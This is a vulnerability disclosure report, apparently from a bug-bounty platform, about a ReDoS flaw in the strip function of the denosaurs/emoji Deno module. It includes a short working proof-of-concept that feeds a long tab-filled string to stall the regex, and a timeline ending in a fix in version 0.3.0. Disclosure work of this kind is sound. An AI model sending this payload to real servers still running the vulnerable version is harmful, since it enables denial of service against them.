ReDoS vulnerability in `strip` function in denosaurs/emoji

Valid

Reported on

Apr 15th 2023

Description

The reTrimSpace regex has 2nd degree polynomial inefficiency, leading to a delayed response given a big payload.

Proof of Concept

import * as emoji from "https://deno.land/x/emoji@0.2.1/mod.ts";

const input = '\x00' + '\t'.repeat(154773) + '\t\x00';
const start = performance.now();
emoji.strip(input);
const end = performance.now();
console.log(Number(end - start).toString());

This usually takes ~12 seconds on a fast PC model.

Impact

Exploiting this vulnerability successfully can lead to staggered delays on a server.

References

recheck by makenowjust

We are processing your report and will contact the denosaurs/emoji team within 24 hours. a month ago

Tristan F. modified the report

a month ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago

We have contacted a member of the denosaurs/emoji team and are waiting to hear back a month ago

We have sent a follow up to the denosaurs/emoji team. We will try again in 7 days. a month ago

A denosaurs/emoji maintainer validated this vulnerability a month ago

Tristan F. has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

A denosaurs/emoji maintainer marked this as fixed in 0.3.0 with commit a61ec1 a month ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

A denosaurs/emoji maintainer published this vulnerability a month ago

to join this conversation